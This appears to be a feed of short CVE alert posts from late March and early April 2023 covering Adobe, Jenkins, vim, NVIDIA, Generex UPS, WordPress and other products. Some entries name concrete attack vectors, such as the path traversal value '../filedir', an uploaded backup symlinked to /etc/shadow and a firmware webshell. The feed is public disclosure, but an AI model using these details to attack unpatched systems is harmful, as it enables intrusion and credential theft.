🚨 CVE-2023-25895Adobe Dimension versions 3.4.7 (and earlier) is affected by a Heap-based Buffer Overflow vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.🎖@cveNotify |
|
| 2023-04-03 06:29:47 |
🚨 CVE-2023-25889Adobe Dimension versions 3.4.7 (and earlier) is affected by an out-of-bounds read vulnerability when parsing a crafted file, which could result in a read past the end of an allocated memory structure. An attacker could leverage this vulnerability to execute code in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.🎖@cveNotify |
|
| 2023-04-03 06:29:46 |
🚨 CVE-2023-25896Adobe Dimension versions 3.4.7 (and earlier) is affected by a Use After Free vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.🎖@cveNotify |
|
| 2023-04-03 06:29:43 |
🚨 CVE-2023-25890Adobe Dimension versions 3.4.7 (and earlier) is affected by a Heap-based Buffer Overflow vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.🎖@cveNotify |
|
| 2023-04-03 06:29:42 |
🚨 CVE-2023-25893Adobe Dimension versions 3.4.7 (and earlier) is affected by a Use After Free vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.🎖@cveNotify |
|
| 2023-04-03 06:29:41 |
🚨 CVE-2023-25892Adobe Dimension versions 3.4.7 (and earlier) is affected by an out-of-bounds read vulnerability when parsing a crafted file, which could result in a read past the end of an allocated memory structure. An attacker could leverage this vulnerability to execute code in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.🎖@cveNotify |
|
| 2023-04-03 06:29:37 |
🚨 CVE-2023-25897Adobe Dimension versions 3.4.7 (and earlier) is affected by a Heap-based Buffer Overflow vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.🎖@cveNotify |
|
| 2023-04-03 06:29:36 |
🚨 CVE-2023-25884Adobe Dimension versions 3.4.7 (and earlier) is affected by an out-of-bounds read vulnerability when parsing a crafted file, which could result in a read past the end of an allocated memory structure. An attacker could leverage this vulnerability to execute code in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.🎖@cveNotify |
|
| 2023-04-03 06:29:35 |
🚨 CVE-2023-25880Adobe Dimension versions 3.4.7 (and earlier) is affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.🎖@cveNotify |
|
| 2023-04-03 00:29:52 |
🚨 CVE-2023-27286IBM Aspera Cargo 4.2.5 and IBM Aspera Connect 4.2.5 are vulnerable to a buffer overflow, caused by improper bounds checking. An attacker could overflow a buffer and execute arbitrary code on the system. IBM X-Force ID: 248616.🎖@cveNotify |
|
| 2023-04-03 00:29:51 |
🚨 CVE-2023-28670Jenkins Pipeline Aggregator View Plugin 1.13 and earlier does not escape a variable representing the current view's URL in inline JavaScript, resulting in a stored cross-site scripting (XSS) vulnerability exploitable by authenticated attackers with Overall/Read permission.🎖@cveNotify |
|
| 2023-04-03 00:29:47 |
🚨 CVE-2023-28673A missing permission check in Jenkins OctoPerf Load Testing Plugin Plugin 4.5.2 and earlier allows attackers with Overall/Read permission to enumerate credentials IDs of credentials stored in Jenkins.🎖@cveNotify |
|
| 2023-04-03 00:29:46 |
🚨 CVE-2023-28675A missing permission check in Jenkins OctoPerf Load Testing Plugin Plugin 4.5.2 and earlier allows attackers to connect to a previously configured Octoperf server using attacker-specified credentials.🎖@cveNotify |
|
| 2023-04-03 00:29:45 |
🚨 CVE-2023-28676A cross-site request forgery (CSRF) vulnerability in Jenkins Convert To Pipeline Plugin 1.0 and earlier allows attackers to create a Pipeline based on a Freestyle project, potentially leading to remote code execution (RCE).🎖@cveNotify |
|
| 2023-04-03 00:29:42 |
🚨 CVE-2023-28677Jenkins Convert To Pipeline Plugin 1.0 and earlier uses basic string concatenation to convert Freestyle projects' Build Environment, Build Steps, and Post-build Actions to the equivalent Pipeline step invocations, allowing attackers able to configure Freestyle projects to prepare a crafted configuration that injects Pipeline script code into the (unsandboxed) Pipeline resulting from a convertion by Jenkins Convert To Pipeline Plugin.🎖@cveNotify |
|
| 2023-04-03 00:29:41 |
🚨 CVE-2023-28679Jenkins Mashup Portlets Plugin 1.1.2 and earlier provides the "Generic JS Portlet" feature that lets a user populate a portlet using a custom JavaScript expression, resulting in a stored cross-site scripting (XSS) vulnerability exploitable by authenticated attackers with Overall/Read permission.🎖@cveNotify |
|
| 2023-04-03 00:29:40 |
🚨 CVE-2023-28681Jenkins Visual Studio Code Metrics Plugin 1.7 and earlier does not configure its XML parser to prevent XML external entity (XXE) attacks.🎖@cveNotify |
|
| 2023-04-03 00:29:36 |
🚨 CVE-2023-28684Jenkins remote-jobs-view-plugin Plugin 0.0.3 and earlier does not configure its XML parser to prevent XML external entity (XXE) attacks.🎖@cveNotify |
|
| 2023-04-03 00:29:35 |
🚨 CVE-2023-1798A vulnerability, which was classified as problematic, has been found in EyouCMS up to 1.5.4. Affected by this issue is some unknown functionality of the file login.php. The manipulation of the argument typename leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-224750 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-04-02 12:30:54 |
🚨 CVE-2023-1800A vulnerability, which was classified as critical, has been found in sjqzhang go-fastdfs up to 1.4.3. Affected by this issue is the function upload of the file /group1/uploa of the component File Upload Handler. The manipulation leads to path traversal: '../filedir'. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-224768.🎖@cveNotify |
|
| 2023-04-02 12:30:53 |
🚨 CVE-2023-1798A vulnerability, which was classified as problematic, has been found in EyouCMS up to 1.5.4. Affected by this issue is some unknown functionality of the file login.php. The manipulation of the argument typename leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-224750 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-04-02 12:30:52 |
🚨 CVE-2023-1799A vulnerability, which was classified as problematic, was found in EyouCMS up to 1.5.4. This affects an unknown part of the file login.php. The manipulation of the argument tag_tag leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-224751.🎖@cveNotify |
|
| 2023-04-02 11:30:59 |
🚨 CVE-2023-1791A vulnerability has been found in SourceCodester Simple Task Allocation System 1.0 and classified as critical. Affected by this vulnerability is an unknown functionality of the file manage_user.php. The manipulation of the argument id leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-224743.🎖@cveNotify |
|
| 2023-04-02 11:30:58 |
🚨 CVE-2023-1792A vulnerability was found in SourceCodester Simple Mobile Comparison Website 1.0 and classified as critical. Affected by this issue is some unknown functionality of the file /admin/fields/manage_field.php of the component GET Parameter Handler. The manipulation of the argument id leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-224744.🎖@cveNotify |
|
| 2023-04-02 06:31:12 |
🚨 CVE-2022-37703In Amanda 3.5.1, an information leak vulnerability was found in the calcsize SUID binary. An attacker can abuse this vulnerability to know if a directory exists or not anywhere in the fs. The binary will use `opendir()` as root directly without checking the path, letting the attacker provide an arbitrary path.🎖@cveNotify |
|
| 2023-04-02 06:31:11 |
🚨 CVE-2023-1355NULL Pointer Dereference in GitHub repository vim/vim prior to 9.0.1402.🎖@cveNotify |
|
| 2023-04-02 06:31:10 |
🚨 CVE-2023-1264NULL Pointer Dereference in GitHub repository vim/vim prior to 9.0.1392.🎖@cveNotify |
|
| 2023-04-02 06:31:09 |
🚨 CVE-2023-1170Heap-based Buffer Overflow in GitHub repository vim/vim prior to 9.0.1376.🎖@cveNotify |
|
| 2023-04-02 06:31:05 |
🚨 CVE-2023-1127Divide By Zero in GitHub repository vim/vim prior to 9.0.1367.🎖@cveNotify |
|
| 2023-04-02 06:31:04 |
🚨 CVE-2023-0512Divide By Zero in GitHub repository vim/vim prior to 9.0.1247.🎖@cveNotify |
|
| 2023-04-02 06:31:03 |
🚨 CVE-2023-28686Dino before 0.2.3, 0.3.x before 0.3.2, and 0.4.x before 0.4.2 allows attackers to modify the personal bookmark store via a crafted message. The attacker can change the display of group chats or force a victim to join a group chat; the victim may then be tricked into disclosing sensitive information.🎖@cveNotify |
|
| 2023-04-02 06:31:02 |
🚨 CVE-2023-27025An arbitrary file download vulnerability in the background management module of RuoYi v4.7.6 and below allows attackers to download arbitrary files in the server.🎖@cveNotify |
|
| 2023-04-02 01:29:56 |
🚨 CVE-2023-26822D-Link Go-RT-AC750 revA_v101b03 was discovered to contain a command injection vulnerability via the service parameter at soapcgi.main.🎖@cveNotify |
|
| 2023-04-02 01:29:55 |
🚨 CVE-2021-23168Out of bounds read for some Intel(R) PROSet/Wireless WiFi and Killer(TM) WiFi products may allow an unauthenticated user to potentially enable denial of service via adjacent access.🎖@cveNotify |
|
| 2023-04-02 01:29:51 |
🚨 CVE-2021-23223Improper initialization for some Intel(R) PROSet/Wireless WiFi and Killer(TM) WiFi products may allow a privileged user to potentially enable escalation of privilege via local access.🎖@cveNotify |
|
| 2023-04-02 01:29:50 |
🚨 CVE-2021-44545Improper input validation for some Intel(R) PROSet/Wireless WiFi and Killer(TM) WiFi products may allow an unauthenticated user to potentially enable denial of service via adjacent access.🎖@cveNotify |
|
| 2023-04-02 01:29:49 |
🚨 CVE-2022-21181Improper input validation for some Intel(R) PROSet/Wireless WiFi and Killer(TM) WiFi products may allow a privileged user to potentially enable escalation of privilege via local access.🎖@cveNotify |
|
| 2023-04-02 01:29:48 |
🚨 CVE-2020-24587The 802.11 standard that underpins Wi-Fi Protected Access (WPA, WPA2, and WPA3) and Wired Equivalent Privacy (WEP) doesn't require that all fragments of a frame are encrypted under the same key. An adversary can abuse this to decrypt selected fragments when another device sends fragmented frames and the WEP, CCMP, or GCMP encryption key is periodically renewed.🎖@cveNotify |
|
| 2023-04-02 01:29:44 |
🚨 CVE-2020-24586The 802.11 standard that underpins Wi-Fi Protected Access (WPA, WPA2, and WPA3) and Wired Equivalent Privacy (WEP) doesn't require that received fragments be cleared from memory after (re)connecting to a network. Under the right circumstances, when another device sends fragmented frames encrypted using WEP, CCMP, or GCMP, this can be abused to inject arbitrary network packets and/or exfiltrate user data.🎖@cveNotify |
|
| 2023-04-02 01:29:43 |
🚨 CVE-2020-12362Integer overflow in the firmware for some Intel(R) Graphics Drivers for Windows * before version 26.20.100.7212 and before Linux kernel version 5.5 may allow a privileged user to potentially enable an escalation of privilege via local access.🎖@cveNotify |
|
| 2023-04-02 01:29:42 |
🚨 CVE-2020-12363Improper input validation in some Intel(R) Graphics Drivers for Windows* before version 26.20.100.7212 and before Linux kernel version 5.5 may allow a privileged user to potentially enable a denial of service via local access.🎖@cveNotify |
|
| 2023-04-02 01:29:41 |
🚨 CVE-2020-12364Null pointer reference in some Intel(R) Graphics Drivers for Windows* before version 26.20.100.7212 and before version Linux kernel version 5.5 may allow a privileged user to potentially enable a denial of service via local access.🎖@cveNotify |
|
| 2023-04-01 21:29:36 |
🚨 CVE-2019-6247An issue was discovered in Anti-Grain Geometry (AGG) 2.4 as used in SVG++ (aka svgpp) 1.2.3. A heap-based buffer overflow bug in svgpp_agg_render may lead to code execution. In the render_scanlines_aa_solid function, the blend_hline function is called repeatedly multiple times. blend_hline is equivalent to a loop containing write operations. Each call writes a piece of heap data, and multiple calls overwrite the data in the heap.🎖@cveNotify |
|
| 2023-04-01 13:29:36 |
🚨 CVE-2022-21233Improper isolation of shared resources in some Intel(R) Processors may allow a privileged user to potentially enable information disclosure via local access.🎖@cveNotify |
|
| 2023-04-01 11:29:52 |
🚨 CVE-2023-28686Dino before 0.2.3, 0.3.x before 0.3.2, and 0.4.x before 0.4.2 allows attackers to modify the personal bookmark store via a crafted message. The attacker can change the display of group chats or force a victim to join a group chat; the victim may then be tricked into disclosing sensitive information.🎖@cveNotify |
|
| 2023-04-01 11:29:48 |
🚨 CVE-2023-0180NVIDIA GPU Display Driver for Linux contains a vulnerability in a kernel mode layer handler, which may lead to denial of service or information disclosure.🎖@cveNotify |
|
| 2023-04-01 11:29:47 |
🚨 CVE-2023-0182NVIDIA GPU Display Driver for Windows contains a vulnerability in the kernel mode layer, where an out-of-bounds write can lead to denial of service, information disclosure, and data tampering.🎖@cveNotify |
|
| 2023-04-01 11:29:46 |
🚨 CVE-2023-0185NVIDIA GPU Display Driver for Linux contains a vulnerability in the kernel mode layer, where sign conversion issuescasting an unsigned primitive to signed may lead to denial of service or information disclosure.🎖@cveNotify |
|
| 2023-04-01 11:29:42 |
🚨 CVE-2023-0187NVIDIA GPU Display Driver for Windows and Linux contains a vulnerability in the kernel mode layer handler, where an out-of-bounds read can lead to denial of service.🎖@cveNotify |
|
| 2023-04-01 11:29:41 |
🚨 CVE-2023-0189NVIDIA GPU Display Driver for Linux contains a vulnerability in the kernel mode layer handler which may lead to code execution, denial of service, escalation of privileges, information disclosure, and data tampering.🎖@cveNotify |
|
| 2023-04-01 11:29:40 |
🚨 CVE-2023-0191NVIDIA GPU Display Driver for Windows and Linux contains a vulnerability in the kernel mode layer handler, where an out-of-bounds access may lead to denial of service or data tampering.🎖@cveNotify |
|
| 2023-04-01 11:29:37 |
🚨 CVE-2023-0192NVIDIA GPU Display Driver for Windows contains a vulnerability in the kernel mode layer handler, where improper privilege management can lead to escalation of privileges and information disclosure.🎖@cveNotify |
|
| 2023-04-01 11:29:36 |
🚨 CVE-2023-0195NVIDIA GPU Display Driver for Windows contains a vulnerability in the kernel mode layer driver nvlddmkm.sys, where an can cause CWE-1284, which may lead to hypothetical Information leak of unimportant data such as local variable data of the driver🎖@cveNotify |
|
| 2023-04-01 11:29:35 |
🚨 CVE-2023-0198NVIDIA GPU Display Driver for Linux contains a vulnerability in the kernel mode layer, where improper restriction of operations within the bounds of a memory buffer can lead to denial of service, information disclosure, and data tampering.🎖@cveNotify |
|
| 2023-04-01 05:29:46 |
🚨 CVE-2023-0208NVIDIA DCGM for Linux contains a vulnerability in HostEngine (server component) where a user may cause a heap-based buffer overflow through the bound socket. A successful exploit of this vulnerability may lead to denial of service and data tampering.🎖@cveNotify |
|
| 2023-04-01 05:29:45 |
🚨 CVE-2023-1789Improper Input Validation in GitHub repository firefly-iii/firefly-iii prior to 6.0.0.🎖@cveNotify |
|
| 2023-04-01 05:29:44 |
🚨 CVE-2022-47188There is an arbitrary file reading vulnerability in Generex UPS CS141 below 2.06 version. An attacker, making use of the default credentials, could upload a backup file containing a symlink to /etc/shadow, allowing him to obtain the content of this path.🎖@cveNotify |
|
| 2023-04-01 05:29:42 |
🚨 CVE-2022-47189Generex UPS CS141 below 2.06 version, allows an attacker toupload a firmware file containing an incorrect configuration, in order to disrupt the normal functionality of the device.🎖@cveNotify |
|
| 2023-04-01 05:29:41 |
🚨 CVE-2022-47190Generex UPS CS141 below 2.06 version, could allow a remote attacker to upload a firmware file containing a webshell that could allow him to execute arbitrary code as root.🎖@cveNotify |
|
| 2023-04-01 05:29:39 |
🚨 CVE-2022-47191Generex UPS CS141 below 2.06 version, could allow a remote attacker to upload a firmware file containing a file with modified permissions, allowing him to escalate privileges.🎖@cveNotify |
|
| 2023-04-01 05:29:38 |
🚨 CVE-2022-47192Generex UPS CS141 below 2.06 version, could allow a remote attacker to upload a backup file containing a modified "users.json" to the web server of the device, allowing him to replace the administrator password.🎖@cveNotify |
|
| 2023-04-01 01:29:51 |
🚨 CVE-2023-24824cmark-gfm is GitHub's fork of cmark, a CommonMark parsing and rendering library and program in C. A polynomial time complexity issue in cmark-gfm may lead to unbounded resource exhaustion and subsequent denial of service. This CVE covers quadratic complexity issues when parsing text which leads with either large numbers of `>` or `-` characters. This issue has been addressed in version 0.29.0.gfm.10. Users are advised to upgrade. Users unable to upgrade should validate that their input comes from trusted sources.🎖@cveNotify |
|
| 2023-04-01 01:29:50 |
🚨 CVE-2023-28645Nextcloud richdocuments is a Nextcloud app integrating the office suit Collabora Online. In affected versions the secure view feature of the rich documents app can be bypassed by using unprotected internal API endpoint of the rich documents app. It is recommended that the Nextcloud Office app (richdocuments) is upgraded to 8.0.0-beta.1, 7.0.2 or 6.3.2. Users unable to upgrade may mitigate the issue by taking steps to restrict the ability to download documents. This includes ensuring that the `WOPI configuration` is configured to only serve documents between Nextcloud and Collabora. It is highly recommended to define the list of Collabora server IPs as the allow list within the Office admin settings of Nextcloud.🎖@cveNotify |
|
| 2023-04-01 01:29:46 |
🚨 CVE-2023-28844Nextcloud server is an open source home cloud implementation. In affected versions users that should not be able to download a file can still download an older version and use that for uncontrolled distribution. This issue has been addressed in versions 24.0.10 and 25.0.4. Users are advised to upgrade. There are no known workarounds for this vulnerability.🎖@cveNotify |
|
| 2023-04-01 01:29:45 |
🚨 CVE-2023-28845Nextcloud talk is a video & audio conferencing app for Nextcloud. In affected versions the talk app does not properly filter access to a conversations member list. As a result an attacker could use this vulnerability to gain information about the members of a Talk conversation, even if they themselves are not members. It is recommended that the Nextcloud Talk is upgraded to 14.0.9 or 15.0.4. There are no known workarounds for this vulnerability.🎖@cveNotify |
|
| 2023-04-01 01:29:44 |
🚨 CVE-2022-47188There is an arbitrary file reading vulnerability in Generex UPS CS141 below 2.06 version. An attacker, making use of the default credentials, could upload a backup file containing a symlink to /etc/shadow, allowing him to obtain the content of this path.🎖@cveNotify |
|
| 2023-04-01 01:29:43 |
🚨 CVE-2022-47189Generex UPS CS141 below 2.06 version, allows an attacker toupload a firmware file containing an incorrect configuration, in order to disrupt the normal functionality of the device.🎖@cveNotify |
|
| 2023-04-01 01:29:39 |
🚨 CVE-2022-47191Generex UPS CS141 below 2.06 version, could allow a remote attacker to upload a firmware file containing a file with modified permissions, allowing him to escalate privileges.🎖@cveNotify |
|
| 2023-04-01 01:29:38 |
🚨 CVE-2022-46021X-Man 1.0 has a SQL injection vulnerability, which can cause data leakage.🎖@cveNotify |
|
| 2023-04-01 01:29:37 |
🚨 CVE-2023-290593CX DesktopApp through 18.12.416 has embedded malicious code, as exploited in the wild in March 2023. This affects versions 18.12.407 and 18.12.416 of the Electron Windows application shipped in Update 7, and versions 18.11.1213, 18.12.402, 18.12.407, and 18.12.416 of the Electron macOS application.🎖@cveNotify |
|
| 2023-03-31 23:29:58 |
🚨 CVE-2023-1784A vulnerability was found in jeecg-boot 3.5.0 and classified as critical. This issue affects some unknown processing of the component API Documentation. The manipulation leads to improper authentication. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-224699.🎖@cveNotify |
|
| 2023-03-31 23:29:57 |
🚨 CVE-2023-1785A vulnerability was found in SourceCodester Earnings and Expense Tracker App 1.0. It has been classified as critical. Affected is an unknown function of the file manage_user.php. The manipulation of the argument id leads to sql injection. It is possible to launch the attack remotely. The identifier of this vulnerability is VDB-224700.🎖@cveNotify |
|
| 2023-03-31 23:29:56 |
🚨 CVE-2023-26858SQL injection vulnerability found in PrestaSHp faqs v.3.1.6 allows a remote attacker to escalate privileges via the faqsBudgetModuleFrontController::displayAjaxGenerateBudget component.🎖@cveNotify |
|
| 2023-03-31 23:29:55 |
🚨 CVE-2023-27162openapi-generator up to v6.4.0 was discovered to contain a Server-Side Request Forgery (SSRF) via the component /api/gen/clients/{language}. This vulnerability allows attackers to access network resources and sensitive information via a crafted API request.🎖@cveNotify |
|
| 2023-03-31 23:29:54 |
🚨 CVE-2023-27163request-baskets up to v1.2.1 was discovered to contain a Server-Side Request Forgery (SSRF) via the component /api/baskets/{name}. This vulnerability allows attackers to access network resources and sensitive information via a crafted API request.🎖@cveNotify |
|
| 2023-03-31 23:29:53 |
🚨 CVE-2023-22256Experience Manager versions 6.5.15.0 (and earlier) are affected by a URL Redirection to Untrusted Site ('Open Redirect') vulnerability. A low-privilege authenticated attacker could leverage this vulnerability to redirect users to malicious websites. Exploitation of this issue requires user interaction.🎖@cveNotify |
|
| 2023-03-31 23:29:52 |
🚨 CVE-2023-22259Experience Manager versions 6.5.15.0 (and earlier) are affected by a URL Redirection to Untrusted Site ('Open Redirect') vulnerability. A low-privilege authenticated attacker could leverage this vulnerability to redirect users to malicious websites. Exploitation of this issue requires user interaction.🎖@cveNotify |
|
| 2023-03-31 23:29:51 |
🚨 CVE-2023-22265Experience Manager versions 6.5.15.0 (and earlier) are affected by a URL Redirection to Untrusted Site ('Open Redirect') vulnerability. A low-privilege authenticated attacker could leverage this vulnerability to redirect users to malicious websites. Exploitation of this issue requires user interaction.🎖@cveNotify |
|
| 2023-03-31 23:29:50 |
🚨 CVE-2023-22257Experience Manager versions 6.5.15.0 (and earlier) are affected by a URL Redirection to Untrusted Site ('Open Redirect') vulnerability. A low-privilege authenticated attacker could leverage this vulnerability to redirect users to malicious websites. Exploitation of this issue requires user interaction.🎖@cveNotify |
|
| 2023-03-31 23:29:49 |
🚨 CVE-2023-22258Experience Manager versions 6.5.15.0 (and earlier) are affected by a URL Redirection to Untrusted Site ('Open Redirect') vulnerability. A low-privilege authenticated attacker could leverage this vulnerability to redirect users to malicious websites. Exploitation of this issue requires user interaction.🎖@cveNotify |
|
| 2023-03-31 23:29:47 |
🚨 CVE-2023-22260Experience Manager versions 6.5.15.0 (and earlier) are affected by a URL Redirection to Untrusted Site ('Open Redirect') vulnerability. A low-privilege authenticated attacker could leverage this vulnerability to redirect users to malicious websites. Exploitation of this issue requires user interaction.🎖@cveNotify |
|
| 2023-03-31 23:29:46 |
🚨 CVE-2023-22261Experience Manager versions 6.5.15.0 (and earlier) are affected by a URL Redirection to Untrusted Site ('Open Redirect') vulnerability. A low-privilege authenticated attacker could leverage this vulnerability to redirect users to malicious websites. Exploitation of this issue requires user interaction.🎖@cveNotify |
|
| 2023-03-31 23:29:45 |
🚨 CVE-2023-22262Experience Manager versions 6.5.15.0 (and earlier) are affected by a URL Redirection to Untrusted Site ('Open Redirect') vulnerability. A low-privilege authenticated attacker could leverage this vulnerability to redirect users to malicious websites. Exploitation of this issue requires user interaction.🎖@cveNotify |
|
| 2023-03-31 23:29:44 |
🚨 CVE-2023-22263Experience Manager versions 6.5.15.0 (and earlier) are affected by a URL Redirection to Untrusted Site ('Open Redirect') vulnerability. A low-privilege authenticated attacker could leverage this vulnerability to redirect users to malicious websites. Exploitation of this issue requires user interaction.🎖@cveNotify |
|
| 2023-03-31 23:29:43 |
🚨 CVE-2023-22264Experience Manager versions 6.5.15.0 (and earlier) are affected by a URL Redirection to Untrusted Site ('Open Redirect') vulnerability. A low-privilege authenticated attacker could leverage this vulnerability to redirect users to malicious websites. Exploitation of this issue requires user interaction.🎖@cveNotify |
|
| 2023-03-31 23:29:42 |
🚨 CVE-2023-22266Experience Manager versions 6.5.15.0 (and earlier) are affected by a URL Redirection to Untrusted Site ('Open Redirect') vulnerability. A low-privilege authenticated attacker could leverage this vulnerability to redirect users to malicious websites. Exploitation of this issue requires user interaction.🎖@cveNotify |
|
| 2023-03-31 23:29:41 |
🚨 CVE-2023-21610Adobe Acrobat Reader versions 22.003.20282 (and earlier), 22.003.20281 (and earlier) and 20.005.30418 (and earlier) are affected by a Stack-based Buffer Overflow vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.🎖@cveNotify |
|
| 2023-03-31 23:29:39 |
🚨 CVE-2023-21614Adobe Acrobat Reader versions 22.003.20282 (and earlier), 22.003.20281 (and earlier) and 20.005.30418 (and earlier) are affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file.🎖@cveNotify |
|
| 2023-03-31 23:29:38 |
🚨 CVE-2023-27164An arbitrary file upload vulnerability in Halo up to v1.6.1 allows attackers to execute arbitrary code via a crafted .md file.🎖@cveNotify |
|
| 2023-03-31 23:29:37 |
🚨 CVE-2018-1000620Eran Hammer cryptiles version 4.1.1 earlier contains a CWE-331: Insufficient Entropy vulnerability in randomDigits() method that can result in An attacker is more likely to be able to brute force something that was supposed to be random.. This attack appear to be exploitable via Depends upon the calling application.. This vulnerability appears to have been fixed in 4.1.2.🎖@cveNotify |
|
| 2023-03-31 20:30:01 |
🚨 CVE-2023-23594An authentication bypass vulnerability in the web client interface for the CL4NX printer before firmware version 1.13.3-u724_r2 provides remote unauthenticated attackers with access to execute commands intended only for valid/authenticated users, such as file uploads and configuration changes.🎖@cveNotify |
|
| 2023-03-31 20:30:00 |
🚨 CVE-2023-26925An information disclosure vulnerability exists in the Syslog functionality of D-LINK DIR-882 1.30. A specially crafted network request can lead to the disclosure of sensitive information.🎖@cveNotify |
|
| 2023-03-31 20:29:59 |
🚨 CVE-2023-27160forem up to v2022.11.11 was discovered to contain a Server-Side Request Forgery (SSRF) via the component /articles/{id}. This vulnerability allows attackers to access network resources and sensitive information via a crafted POST request.🎖@cveNotify |
|
| 2023-03-31 20:29:55 |
🚨 CVE-2023-29139An issue was discovered in the CheckUser extension for MediaWiki through 1.39.3. When a user with checkuserlog permissions makes many CheckUserLog API requests in some configurations, denial of service can occur (RequestTimeoutException or upstream request timeout).🎖@cveNotify |
|
| 2023-03-31 20:29:54 |
🚨 CVE-2023-29140An issue was discovered in the GrowthExperiments extension for MediaWiki through 1.39.3. Attackers might be able to see edits for which the username has been hidden, because there is no check for rev_deleted.🎖@cveNotify |
|
| 2023-03-31 20:29:53 |
🚨 CVE-2023-27161Jellyfin up to v10.7.7 was discovered to contain a Server-Side Request Forgery (SSRF) via the component /Repositories. This vulnerability allows attackers to access network resources and sensitive information via a crafted POST request.🎖@cveNotify |
|
| 2023-03-31 20:29:49 |
🚨 CVE-2023-27241SourceCodester Water Billing System v1.0 was discovered to contain a cross-site scripting (XSS) vulnerability via the lastname text box under the Add Client module.🎖@cveNotify |
|
| 2023-03-31 20:29:48 |
🚨 CVE-2023-26338Adobe Dimension versions 3.4.7 (and earlier) is affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file.🎖@cveNotify |
|
| 2023-03-31 20:29:47 |
🚨 CVE-2023-26340Adobe Dimension versions 3.4.7 (and earlier) is affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file.🎖@cveNotify |
|
| 2023-03-31 20:29:43 |
🚨 CVE-2023-27245A cross-site scripting (XSS) vulnerability in File Management Project 1.0.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Name field under the Edit User module.🎖@cveNotify |
|
| 2023-03-31 20:29:42 |
🚨 CVE-2023-26336Adobe Dimension versions 3.4.7 (and earlier) is affected by a Use After Free vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.🎖@cveNotify |
|
| 2023-03-31 20:29:41 |
🚨 CVE-2023-26334Adobe Dimension versions 3.4.7 (and earlier) is affected by an Access of Uninitialized Pointer vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.🎖@cveNotify |
|
| 2023-03-31 18:29:51 |
🚨 CVE-2020-36499TAO Open Source Assessment Platform v3.3.0 RC02 was discovered to contain a cross-site scripting (XSS) vulnerability in the content parameter of the Rubric Block (Add) module. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload in the rubric name value.🎖@cveNotify |
|
| 2023-03-31 18:29:50 |
🚨 CVE-2019-11274Cloud Foundry UAA, versions prior to 74.0.0, is vulnerable to an XSS attack. A remote unauthenticated malicious attacker could craft a URL that contains a SCIM filter that contains malicious JavaScript, which older browsers may execute.🎖@cveNotify |
|
| 2023-03-31 17:30:03 |
🚨 CVE-2023-1087The WC Sales Notification WordPress plugin before 1.2.3 does not have CSRF check when activating plugins, which could allow attackers to make logged in admins activate arbitrary plugins present on the blog via a CSRF attack🎖@cveNotify |
|
| 2023-03-31 17:30:02 |
🚨 CVE-2023-1086The Preview Link Generator WordPress plugin before 1.0.4 does not have CSRF check when activating plugins, which could allow attackers to make logged in admins activate arbitrary plugins present on the blog via a CSRF attack🎖@cveNotify |
|
| 2023-03-31 17:30:01 |
🚨 CVE-2023-1069The Complianz WordPress plugin before 6.4.2, Complianz Premium WordPress plugin before 6.4.2 do not validate and escape some of its shortcode attributes before outputting them back in a page/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks🎖@cveNotify |
|
| 2023-03-31 17:30:00 |
🚨 CVE-2023-1025The Simple File List WordPress plugin before 6.0.10 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).🎖@cveNotify |
|
| 2023-03-31 17:29:59 |
🚨 CVE-2023-0955The WP Statistics WordPress plugin before 14.0 does not escape a parameter, which could allow authenticated users to perform SQL Injection attacks. By default, the affected feature is available to users with the manage_options capability (admin+), however the plugin has a settings to allow low privilege users to access it as well.🎖@cveNotify |
|
| 2023-03-31 17:29:55 |
🚨 CVE-2023-0660The Smart Slider 3 WordPress plugin before 3.5.1.14 does not properly validate and escape some of its shortcode attributes before outputting them back in a page/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks🎖@cveNotify |
|
| 2023-03-31 17:29:54 |
🚨 CVE-2023-0505The Ever Compare WordPress plugin through 1.2.3 does not have CSRF check when activating plugins, which could allow attackers to make logged in admins activate arbitrary plugins present on the blog via a CSRF attack🎖@cveNotify |
|
| 2023-03-31 17:29:53 |
